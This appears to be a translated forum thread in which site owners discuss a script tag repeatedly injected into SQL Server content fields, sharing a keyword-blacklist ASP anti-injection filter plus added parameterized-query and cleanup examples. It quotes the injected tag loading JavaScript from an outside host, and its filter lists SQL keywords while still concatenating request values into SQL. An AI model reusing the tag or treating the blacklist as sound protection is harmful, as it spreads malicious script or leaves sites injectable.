Several of my websites have recently been hit again and again with malicious script planted in the SQL Server database. Usually something like <Script Src=http://c.nuclea%723.com/css/c.js></Script> is inserted into the content, title and similar fields.
I delete it or restore the database, and a few hours later it happens again.
I have scanned with HDIS, WED and 网站啄木鸟 (the "Website Woodpecker" scanner); all of them report that no injection point can be found (I added filtering in my code).
I don't know what method he is using to get the injection in.
Friends, please help me think of something.
I've heard of several cases like this recently.
dbkillSql="/SqlIn.mdb"
'On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql
If Err Then
    err.Clear
    Set killSqlconn = Nothing
    Response.Write "数据库连接出错,请检查连接字串。"
    Response.End
End If
'-------- Definitions ------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_InForm,Fy_Inf,Fy_Inf_Form,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql,str
'Custom list of strings to filter, separated by "|"
Fy_In = "'|;|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|where|create|drop "
'Looser list for POST data (no ' and no %), so form text may contain apostrophes and percent signs
Fy_InForm = ";|exec|insert|select|delete|update|count|*|chr|mid|master|truncate|char|declare|where|create|drop "
Kill_IP=True
WriteSql=True
'----------------------------------
Fy_Inf = split(Fy_In,"|")
'The POST loop used Fy_Inf_Form as its upper bound but Fy_Inf for the lookup, and Fy_InForm was never split; both fixed here
Fy_Inf_Form = split(Fy_InForm,"|")
'-------- POST section ------------------
If Request.Form<>"" Then
    For Each Fy_Post In Request.Form
        str=LCase(Request.Form(Fy_Post))
        For Fy_Xh=0 To Ubound(Fy_Inf_Form)
            If Instr(str,Fy_Inf_Form(Fy_Xh))<>0 Then
                If WriteSql=True Then
                    'Single quotes in the logged values are doubled so the log insert itself cannot be broken by them
                    killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&replace(Fy_Post,"'","''")&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
                    killSqlconn.close
                    Set killSqlconn = Nothing
                End If
                Response.Write "<Script Language=JavaScript>alert('请不要在参数中包含非法字符尝试注入!');</Script>"
                Response.Write "非法操作!系统做了如下记录↓<br>"
                Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "操作时间:"&Now&"<br>"
                Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
                Response.Write "提交方式:POST<br>"
                Response.Write "提交参数:"&Fy_Post&"<br>"
                Response.Write "提交数据:"&Request.Form(Fy_Post)
                Response.End
            End If
        Next
    Next
End If
'----------------------------------
'-------- GET section -------------------
If Request.QueryString<>"" Then
    For Each Fy_Get In Request.QueryString
        For Fy_Xh=0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
                If WriteSql=True Then
                    killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&replace(Fy_Get,"'","''")&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")
                    killSqlconn.close
                    Set killSqlconn = Nothing
                End If
                Response.Write "<Script Language=JavaScript>alert('SQL通用防注入系统提示你↓\n\n请不要在参数中包含非法字符尝试注入!\n\nHttp://Www.wrsky.Com 系统版本:V3.0(ASP)版\n\nBy:Neeao');</Script>"
                Response.Write "非法操作!系统做了如下记录↓<br>"
                Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "操作时间:"&Now&"<br>"
                Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
                Response.Write "提交方式:GET<br>"
                Response.Write "提交参数:"&Fy_Get&"<br>"
                Response.Write "提交数据:"&Request.QueryString(Fy_Get)
                Response.End
            End If
        Next
    Next
End If
'-------- IP lock section ---------------
If Kill_IP=True Then
    Dim Sqlin_IP,rsKill_IP,Kill_IPsql
    Sqlin_IP=Request.ServerVariables("REMOTE_ADDR")
    Kill_IPsql="select Sqlin_IP from SqlIn where Sqlin_IP='"&Sqlin_IP&"' and kill_ip=true"
    Set rsKill_IP=killSqlconn.execute(Kill_IPsql)
    If Not(rsKill_IP.eof or rsKill_IP.bof) Then
        Response.write "<Script Language=JavaScript>alert('你的Ip已经被本系统自动锁定!\n\n如想访问本站请和管理员联系!');</Script>"
        Response.End
    End If
    rsKill_IP.close
End If
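The filter above only looks for keywords in request values; whether an injection is possible is decided by how the pages themselves build their SQL. As an added illustration (this is not code from the thread or from the Neeao filter), here is a news display page written in classic ASP that looks a record up by id with an ADODB.Command and a bound parameter, so the request value is never spliced into the SQL text and the keyword list becomes irrelevant for this page. The table and column names news, id, title and content, and the connection string variable connStr, are assumptions.

```vbscript
<%
Option Explicit
' Added example: parameterized lookup for a news display page (classic ASP / VBScript).
' Assumed names: table news(id, title, content); connStr holds the SQL Server connection string.
Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

Dim rawId, newsId, re, conn, cmd, rs
rawId = Request.QueryString("id")

' Whitelist validation: the id must be a plain decimal integer. Anything else is
' rejected before any SQL exists, so no blacklist of keywords is needed for it.
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid id"
    Response.End
End If
newsId = CLng(rawId)

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open connStr

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' The SQL text is fixed; the value travels as a typed parameter, so quotes,
' semicolons or keywords in the input can never change the statement.
cmd.CommandText = "SELECT title, content FROM news WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , newsId)

Set rs = cmd.Execute

If Not rs.EOF Then
    ' Encoding on output turns a <script> tag that is already stored in the
    ' column into visible text instead of letting the browser run it.
    Response.Write "<h1>" & Server.HTMLEncode(rs("title")) & "</h1>"
    Response.Write "<div>" & Server.HTMLEncode(rs("content")) & "</div>"
Else
    Response.Write "Not found"
End If

rs.Close
conn.Close
Set rs = Nothing
Set cmd = Nothing
Set conn = Nothing
%>
```

If the content column is supposed to hold HTML written by editors, Server.HTMLEncode on the whole field is too blunt; in that case encode the title only and clean the content column in the database instead. The same CreateParameter pattern (adVarWChar for strings) applies to the INSERT and UPDATE statements behind the admin forms, which is where the stored script most likely entered.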
I know there is also injection through forged cookies; I didn't filter for that, but none of these sites use cookies, they all use session.
Filter ' into its fullwidth form
and that's it.
This is the news display page; it is usually injected into the content field.
By rights, nobody should be able to guess my table names.
If I filter out <> and the like, what about legitimate users who need to type those characters? My previous approach was to use the following function:
function sqlin(str)
if str<>"" then
str=replace(str," "," ")
str=replace(str,"'","’")
str=replace(str,";",";")
str=replace(str,"and","AND")
str=replace(str,"exec","EXEC")
str=replace(str,"insert","INSERT")
str=replace(str,"select","SELECT")
str=replace(str,"delete","DELETE")
str=replace(str,"update","UPDATE")
str=replace(str,"count","COUNT")
str=replace(str,"*","*")
str=replace(str,"%","%")
str=replace(str,"chr","CHR")
str=replace(str,"mid","MID")
str=replace(str,"master","MASTER")
str=replace(str,"truncate","TRUNCATE")
str=replace(str,"char","CHAR")
'str=rep   (the rest of the replace list is cut off in the original post)
end if
sqlin=str
end function
It replaces the characters in the input before the value is used,
e.g. a=sqlin(request("a"))
At the same time I also used the filter I posted in reply #3, but it didn't seem to work. Later I thought: maybe because the filter runs before this function, any illegal characters are already blocked by the filter, so this function never gets a chance to do anything.
Is my understanding correct? Please advise, friends.
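Whatever filter is chosen, the rows that already carry the planted tag have to be found and cleaned, and the thread says a restore only helps for a few hours. As an added example (not code from this thread), here is an admin-only classic ASP script that lists every news row containing a script tag and then strips one known fragment, pasted into a form field, from the title and content columns. Both statements are parameterized, and the LIKE wildcards in the fragment are escaped so that a "%" inside the injected URL (as in the one quoted at the top of the thread) is matched literally. The names news, id, title, content and connStr are assumptions.

```vbscript
<%
Option Explicit
' Added example: detect rows that carry an injected <script> tag and strip one known fragment.
' Assumed names: table news(id, title, content); connStr holds the SQL Server connection string.
Const adCmdText = 1
Const adVarWChar = 202
Const adParamInput = 1

' Escape the LIKE wildcards so the fragment is matched literally ("[" first, then "%" and "_").
Function LikeLiteral(s)
    LikeLiteral = Replace(Replace(Replace(s, "[", "[[]"), "%", "[%]"), "_", "[_]")
End Function

Dim conn, cmd, rs, injected, hits
' The fragment to remove is taken as data and bound as a parameter, never concatenated.
injected = Request.Form("fragment")

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open connStr

' 1. Detection: which rows contain a script tag at all?
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT id, title FROM news WHERE title LIKE ? OR content LIKE ?"
cmd.Parameters.Append cmd.CreateParameter("@p1", adVarWChar, adParamInput, 50, "%<script%")
cmd.Parameters.Append cmd.CreateParameter("@p2", adVarWChar, adParamInput, 50, "%<script%")
Set rs = cmd.Execute
hits = 0
Do While Not rs.EOF
    hits = hits + 1
    Response.Write "tainted row id=" & rs("id") & " title=" & Server.HTMLEncode(rs("title")) & "<br>"
    rs.MoveNext
Loop
rs.Close
Response.Write hits & " row(s) contain a script tag<br>"

' 2. Cleanup of one known fragment, also parameterized.
If injected <> "" And hits > 0 Then
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "UPDATE news SET title = REPLACE(title, ?, ''), content = REPLACE(content, ?, '') " & _
                      "WHERE title LIKE ? OR content LIKE ?"
    cmd.Parameters.Append cmd.CreateParameter("@f1", adVarWChar, adParamInput, 4000, injected)
    cmd.Parameters.Append cmd.CreateParameter("@f2", adVarWChar, adParamInput, 4000, injected)
    cmd.Parameters.Append cmd.CreateParameter("@l1", adVarWChar, adParamInput, 4000, "%" & LikeLiteral(injected) & "%")
    cmd.Parameters.Append cmd.CreateParameter("@l2", adVarWChar, adParamInput, 4000, "%" & LikeLiteral(injected) & "%")
    cmd.Execute
    Response.Write "fragment removed<br>"
End If

conn.Close
Set rs = Nothing
Set cmd = Nothing
Set conn = Nothing
%>
```

REPLACE does not accept the old text/ntext column types; if content is declared that way, cast it to nvarchar(max) (SQL Server 2005 and later) or use UPDATETEXT. Run the detection part after every suspected reinfection: the count of tainted rows, together with the IIS logs for the same hour, is what shows which page the requests went through, which the poster's scanners could not tell him.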
This doesn't look like something done by hand; it looks more like an automated tool.
15058618 DOTNET enthusiasts group